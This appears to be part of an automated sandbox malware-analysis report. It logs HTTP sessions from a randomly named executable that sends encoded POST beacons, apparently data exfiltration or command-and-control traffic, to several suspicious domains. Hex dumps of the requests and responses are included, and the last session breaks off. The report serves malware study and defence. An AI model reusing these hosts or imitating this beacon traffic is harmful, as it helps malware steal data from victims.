                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 67 6e 37 51 66 6b 4e 30 52 43 4e 4d 38 43 6d 46 4b 2b 53 46 30 2b 6c 49 51 68 75 67 4c 33 46 68 36 32 65 77 6a 55 6f 65 79 7a 52 49 37 4c 44 36 2b 52 2f 59 71 31 64 77 77 43 38 78 43 49 46 33 33 31 4d 55 58 56 57 71 74 56 5a 32 63 68 49 34 6f 50 6a 32 34 61 38 49 4b 4c 7a 70 2f 48 63 58 78 42 51 36 70 63 30 49 6e 50 70 4f 45 72 35 54 66 50 64 51 6a 47 6c 33 65 62 71 51 42 55 68 6b 4c 51 65 6a 62 54 4b 6a 36 34 48 50 39 34 42 56 59 57 54 64 37 33 57 70 68 4e 41 6f 32 4c 43 73 51 67 55 59 59 30 67 44 64 58 51 59 65 65 30 30 32 41 51 34 50 4b 4f 7a 70 4a 75 66 67 72 65 52 59 74 6a 42 55 38 42 6f 54 51 61 54 6c 32 44 68 33 59 74 43 75 2f 31 63 55 50 6e 31 74 5a 37 63 5a 63 31 58 32 77 47 79 70 6f 31 57 7a 62 6a 4c 34 66 56 54 54 6c 39 4a 49 78 39 63 41 70 6a 49 4b 55 43 47 38 74 53 6d 67 52 54 68 66 71 2f 78 6e 61 49 2f 74 37 39 75 50 64 51 58 65 75 35 6d 48 58 4b 4f 75 77 54 59 62 79 55 31 76 79 58 68 73 41 50 58 33 52 32 79 67 62 46 65 42 7a 4c 73 55 67 77 71 54 79 30 71 64 69 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzRI7LD6+R/Yq1dwwC8xCIF331MUXVWqtVZ2chI4oPj24a8IKLzp/HcXxBQ6pc0InPpOEr5TfPdQjGl3ebqQBUhkLQejbTKj64HP94BVYWTd73WphNAo2LCsQgUYY0gDdXQYee002AQ4PKOzpJufgreRYtjBU8BoTQaTl2Dh3YtCu/1cUPn1tZ7cZc1X2wGypo1WzbjL4fVTTl9JIx9cApjIKUCG8tSmgRThfq/xnaI/t79uPdQXeu5mHXKOuwTYbyU1vyXhsAPX3R2ygbFeBzLsUgwqTy0qdi4cmpd7aXiKiW3eG3AoaUZGYP7+w4WdpOTDOwlBzfpjrajgG1bZJAwCZ7ervVDsqkBl7CHW1sxgrNGAwV2d8W0KnxQ/Jh2X8RKaSiiHfCOjixpHJUHtxfvDXD6GlqBlKhI4q9ugUmX/4NHa7eMCUrdGDJR6gY9815bqPpKpPB2g6ThWBaqUaE5y3ZHcjBtb0+sp4m4wZJs8/5BlP06ToSp8/zlVnhGL1eChV2FugYykNtXbzl1GsJ/wa1H3nQoMQYKm1WtBqQJGwCoCbiqsOsvI4MQKTuQxuRmXgMsbFFDxiRkU463HWcWUNeV8gIbx9pccORwi3D8DCXyP8qh/vgyHv63LRRIvi1IWaqXSqG+bWiyKFiHMa8jvEMUicBDoXr9HP7Pg1L+Zy8TVdGyoMxJWr4pXwRU9DCrMGw0a/veYZvkeJXMfuCvFEpadyb5zR4uCEfWQi4YFdhPYfMFJxr+IZl0Y/+qVdh+qG1uto3LJFE3aumWqRSvrhM7Na1ximPZN4TsewlCKdTrfmXbuQt+qmoFOQDyLAESDgjclrfjaDzddE2ROrQO1co8Nw+LR/8nT+CpnrDGOFns0Yc7T+kyjEOAqre4wtiw0P6MBIObWZB0jisfso0p7kk5v1nFU83I0j5Yn+jUhEXFJpJ6kBm26nfWiU4dqp1op [TRUNCATED]
                                                                    Jan 10, 2025 09:12:45.679068089 CET977INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:45 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJDDB%2F2M9nEZ7cYFHW6mKb58ePa3bHBQj9SsEqrBXF8ufupJyX0aE6SnKnWj5gpW28FwvFrxtuAnThEc%2BBe0tniA4fnTXY4e%2FQkkukKd9UWcRdrQ62aziAG%2Bq9E%2FgR9%2F%2Bhsv"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb342e5b14c358-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1812&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.650008104.21.64.1806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:47.325608015 CET519OUTGET /utww/?-0-L9xY=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:12:48.218502998 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:48 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fg%2Foqeh5PKJsRIbWbtuaHM5dHL9iQvDdgTx9fr5WM8AzcZhuNevVt8I%2FdajrOaxy44AXjoCw67pcZ%2FgAmCxJjR1wuhDl4hDeLelnBJakTyeEU8KwS%2BMXW8ptPJ0PV0YX%2FfwR"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb343e3d3f42e9-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien
                                                                    Jan 10, 2025 09:12:48.218521118 CET94INData Raw: 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20
                                                                    Data Ascii: dly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.65001176.223.67.189806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:09.844005108 CET775OUTPOST /s1ai/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Origin: http://www.infovea.tech
                                                                    Referer: http://www.infovea.tech/s1ai/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 44 63 47 69 42 4f 41 65 4e 69 33 47 33 78 53 59 6b 77 4e 61 56 41 34 64 6d 38 49 46 73 45 42 57 73 53 78 55 56 52 65 79 45 68 53 62 6e 67 4f 48 63 73 36 4b 31 4a 69 2f 37 64 33 46 48 58 56 48 43 73 4d 45 72 6e 41 32 44 35 53 65 72 72 38 34 6c 67 45 65 73 34 68 34 38 54 52 69 63 42 2b 59 30 42 54 62 4a 42 36 4e 45 6a 49 73 75 33 6f 36 49 6b 6a 30 6a 5a 38 41 70 6b 61 72 78 66 6c 46 6a 43 70 2f 44 6a 73 65 52 50 6a 4a 42 75 31 47 37 35 5a 73 45 33 44 57 61 61 5a 45 4b 76 78 45 37 47 50 78 66 6e 67 65 2f 7a 55 6a 77 72 30 34 63 45 4c 66 31 4d 52 6b 36 57 4b 31 52 53 7a 62 32 2b 2b 74 5a 52 4a 4a 62 52 62 35
                                                                    Data Ascii: -0-L9xY=DcGiBOAeNi3G3xSYkwNaVA4dm8IFsEBWsSxUVReyEhSbngOHcs6K1Ji/7d3FHXVHCsMErnA2D5Serr84lgEes4h48TRicB+Y0BTbJB6NEjIsu3o6Ikj0jZ8ApkarxflFjCp/DjseRPjJBu1G75ZsE3DWaaZEKvxE7GPxfnge/zUjwr04cELf1MRk6WK1RSzb2++tZRJJbRb5
                                                                    Jan 10, 2025 09:13:10.284492016 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.65001276.223.67.189806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:12.390806913 CET799OUTPOST /s1ai/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Origin: http://www.infovea.tech
                                                                    Referer: http://www.infovea.tech/s1ai/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 44 63 47 69 42 4f 41 65 4e 69 33 47 34 77 69 59 6d 54 31 61 43 77 34 65 6a 38 49 46 31 55 42 53 73 53 4e 55 56 55 2b 69 45 7a 32 62 6e 42 2b 48 64 74 36 4b 32 4a 69 2f 7a 39 33 41 49 33 56 49 43 73 51 69 72 6d 38 32 44 39 36 65 72 70 30 34 6b 57 4d 64 6a 49 68 36 6c 44 52 67 44 78 2b 59 30 42 54 62 4a 42 75 33 45 6a 51 73 75 6e 34 36 49 46 6a 31 70 35 38 44 2b 55 61 72 31 66 6c 42 6a 43 70 42 44 6d 46 31 52 4e 4c 4a 42 74 68 47 37 6f 5a 76 4b 33 43 66 55 36 59 72 4f 4b 41 4e 6a 56 57 53 62 46 77 4a 70 44 77 62 78 64 70 69 41 33 4c 38 6e 63 78 6d 36 55 53 48 52 79 7a 78 30 2b 47 74 4c 47 46 75 55 6c 2b 61 61 45 53 4e 62 6c 77 33 6a 30 6b 38 50 38 55 52 4c 4e 33 76 2f 41 3d 3d
                                                                    Data Ascii: -0-L9xY=DcGiBOAeNi3G4wiYmT1aCw4ej8IF1UBSsSNUVU+iEz2bnB+Hdt6K2Ji/z93AI3VICsQirm82D96erp04kWMdjIh6lDRgDx+Y0BTbJBu3EjQsun46IFj1p58D+Uar1flBjCpBDmF1RNLJBthG7oZvK3CfU6YrOKANjVWSbFwJpDwbxdpiA3L8ncxm6USHRyzx0+GtLGFuUl+aaESNblw3j0k8P8URLN3v/A==
                                                                    Jan 10, 2025 09:13:12.831665993 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.65001376.223.67.189806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:14.945652962 CET1812OUTPOST /s1ai/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Origin: http://www.infovea.tech
                                                                    Referer: http://www.infovea.tech/s1ai/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 44 63 47 69 42 4f 41 65 4e 69 33 47 34 77 69 59 6d 54 31 61 43 77 34 65 6a 38 49 46 31 55 42 53 73 53 4e 55 56 55 2b 69 45 7a 2b 62 6e 54 47 48 63 4b 6d 4b 33 4a 69 2f 35 64 33 42 49 33 56 76 43 73 59 6d 72 6d 77 63 44 2f 79 65 6f 4d 67 34 31 54 73 64 30 59 68 36 71 6a 52 68 63 42 2f 41 30 42 6a 6c 4a 42 2b 33 45 6a 51 73 75 68 55 36 66 45 6a 31 36 70 38 41 70 6b 61 76 78 66 6c 70 6a 43 78 52 44 6d 4a 44 4e 74 72 4a 43 4e 78 47 35 65 46 76 43 33 43 52 54 36 59 7a 4f 4b 45 4f 6a 57 79 30 62 48 51 6a 70 41 73 62 39 5a 63 4e 48 45 4c 54 34 66 70 65 6b 58 69 59 53 46 62 42 35 34 4f 6c 47 6c 38 53 58 6e 4f 59 62 42 75 4f 54 46 46 55 74 45 74 53 42 73 31 44 4e 4d 36 5a 69 2f 45 62 4f 32 44 75 4b 42 59 5a 48 45 57 50 59 65 55 69 4c 46 33 5a 46 61 74 73 56 37 33 43 6f 37 6d 37 47 44 4e 44 59 35 2f 6e 72 76 34 44 6d 4a 48 54 52 61 4f 36 6a 37 50 30 4c 6c 38 31 6a 2f 67 62 32 42 65 37 55 6d 51 6a 42 63 74 38 41 45 68 32 78 6e 4c 43 7a 4c 51 4b 67 76 68 57 34 71 61 75 32 55 48 30 4a 75 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=DcGiBOAeNi3G4wiYmT1aCw4ej8IF1UBSsSNUVU+iEz+bnTGHcKmK3Ji/5d3BI3VvCsYmrmwcD/yeoMg41Tsd0Yh6qjRhcB/A0BjlJB+3EjQsuhU6fEj16p8ApkavxflpjCxRDmJDNtrJCNxG5eFvC3CRT6YzOKEOjWy0bHQjpAsb9ZcNHELT4fpekXiYSFbB54OlGl8SXnOYbBuOTFFUtEtSBs1DNM6Zi/EbO2DuKBYZHEWPYeUiLF3ZFatsV73Co7m7GDNDY5/nrv4DmJHTRaO6j7P0Ll81j/gb2Be7UmQjBct8AEh2xnLCzLQKgvhW4qau2UH0JuXCae7zvfsBt+L/UR0hCtF3NyfD3RE5YOZKnzvruyxB2TTemeeO6JQeCeGrIzu5crsSSabJwO4GzyR22vkk16SvIAmNU1o+q4mJ7IAehZT7vEzbnI/qVHnVT3sz9zNJPoJiUxTo3sf+BOtTkbZKtlBBpRhP5AAkbCIEKlM1epxzMn2NqQtsVHsU2x9E6NI5yZabNDzqLo73nZtBRmFRx/SXp8jRgzi7ODWhPc/neBZHOqgAzTqKjIKJ+h04otkucG4sRpLlEUu3mL+RvKxfagrW2ngPa1pMh9hx4LM2+HetOsHvZitSs3jZzsQWs/Mp+QBx6ntKS6RTOb8TJOGoa+isrIvY9izy1TbA6Nlq0GbghV8rTvWE/B2S0dphpyt654Jdo0TZZjgIqvPX6z2iCSpUQ/WGS4IItxvFO7yJCWXWrCXO9S+zLyVyuKRC9aPJUAjMoD1H1Q4Sy9eCb4KBjXg5Mhxd7jYLrQyI0rHKyFA/9HYOvoQBjcr4RyWirhVlOa4LrBY54WDjm15J3W1t2uJVh7b2vLSsp/X7/rkKZaJY66rnXTFmn4lJ2ZYDwaI01zaqY4pYDEx/6uvG4ss54GD9devIsxnNNJzllRijfHOz19RPDZuwlCYgRsXQ024SXd9Ya1Sw/AI9Gfn7yG0jfDmGsDFQpFPMgckq [TRUNCATED]
                                                                    Jan 10, 2025 09:13:15.395951986 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.65001476.223.67.189806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:17.642287016 CET519OUTGET /s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.infovea.tech
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:13:18.081914902 CET396INHTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Fri, 10 Jan 2025 08:13:18 GMT
                                                                    content-length: 275
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 6e 3d 50 64 4f 38 77 5a 6e 78 47 6e 5a 58 26 2d 30 2d 4c 39 78 59 3d 4f 65 75 43 43 34 41 41 51 53 32 77 36 44 65 5a 6d 79 6b 4f 42 55 49 43 79 2b 49 62 6a 78 39 44 33 52 67 54 53 44 6d 4c 47 79 66 70 79 54 6d 52 66 2f 4f 67 32 34 71 50 69 71 4c 56 50 32 78 35 53 72 39 6a 69 33 30 30 49 65 71 72 6f 72 30 76 70 7a 63 73 73 4c 68 63 6f 51 42 51 44 54 61 66 6c 54 6a 57 45 6d 76 30 63 57 63 76 77 6a 35 45 41 33 71 43 72 64 4d 41 69 69 79 72 6f 71 5a 32 71 53 4e 36 4e 32 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28="}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.650015103.247.11.204806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:24.045180082 CET775OUTPOST /h4q2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Origin: http://www.itcomp.store
                                                                    Referer: http://www.itcomp.store/h4q2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 44 35 2b 32 70 4c 46 5a 78 36 31 53 75 39 56 51 6d 53 53 78 77 68 68 69 4d 35 31 56 63 33 67 36 5a 71 4c 4f 7a 6a 36 51 62 44 4a 2b 5a 39 41 33 4e 2f 37 6f 4c 68 59 33 58 58 4a 41 38 45 4b 4e 4b 67 74 2b 74 74 41 33 2f 36 59 61 64 70 38 57 2f 71 67 48 46 32 76 6f 56 30 71 51 79 47 6c 49 32 7a 33 66 44 61 2f 53 30 36 62 5a 70 68 52 67 62 37 76 79 77 6e 50 6f 47 30 2f 77 45 30 63 66 77 2f 79 30 72 33 51 69 6a 33 54 79 66 2b 61 55 32 51 59 43 43 50 6b 2f 45 50 6d 5a 37 59 2f 77 68 52 4d 44 38 69 51 77 69 4c 56 68 6c 55 47 73 46 47 33 39 50 30 63 64 32 4d 73 4e 6b 44 4f 4d 48 57 52 62 45 73 63 77 57 62 2b 54
                                                                    Data Ascii: -0-L9xY=D5+2pLFZx61Su9VQmSSxwhhiM51Vc3g6ZqLOzj6QbDJ+Z9A3N/7oLhY3XXJA8EKNKgt+ttA3/6Yadp8W/qgHF2voV0qQyGlI2z3fDa/S06bZphRgb7vywnPoG0/wE0cfw/y0r3Qij3Tyf+aU2QYCCPk/EPmZ7Y/whRMD8iQwiLVhlUGsFG39P0cd2MsNkDOMHWRbEscwWb+T
                                                                    Jan 10, 2025 09:13:24.945547104 CET479INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:23 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.650016103.247.11.204806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:26.592706919 CET799OUTPOST /h4q2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Origin: http://www.itcomp.store
                                                                    Referer: http://www.itcomp.store/h4q2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
